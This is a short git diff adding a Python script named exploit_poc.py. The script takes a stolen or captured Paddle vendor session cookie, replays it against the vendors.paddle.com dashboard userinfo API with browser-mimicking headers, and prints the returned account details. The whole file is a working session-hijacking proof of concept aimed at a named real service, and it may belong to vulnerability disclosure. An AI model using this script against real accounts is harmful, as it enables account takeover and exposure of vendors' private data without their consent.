diff --git a/exploit_poc.py b/exploit_poc.py
new file mode 100644
index 0000000..c238311
--- /dev/null
+++ b/exploit_poc.py
@@ -0,0 +1,30 @@
+import requests
+from rich.table import Table
+from rich.console import Console
+
+TOKEN = input("Insert paddle_session_vendor token: ")
+
+headers = {
+    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
+    "Accept": "*/*",
+    "Referer": "https://vendors.paddle.com/dashboard",
+}
+
+cookies = {
+    "paddle_session_vendor": TOKEN
+}
+
+response = requests.get("https://vendors.paddle.com/dashboard/api/userinfo", headers=headers, cookies=cookies)
+
+if response.status_code == 200:
+    data = response.json()
+    console = Console()
+    table = Table(title="Paddle /userinfo", show_header=True, header_style="bold cyan")
+    table.add_column("Field", style="bold white", no_wrap=True)
+    table.add_column("Value", style="green")
+    for key, value in data.items():
+        table.add_row(str(key), str(value))
+    console.print(table)
+else:
+    print(f"[!] Failed — Status: {response.status_code}")
+    print(response.json())
\ No newline at end of file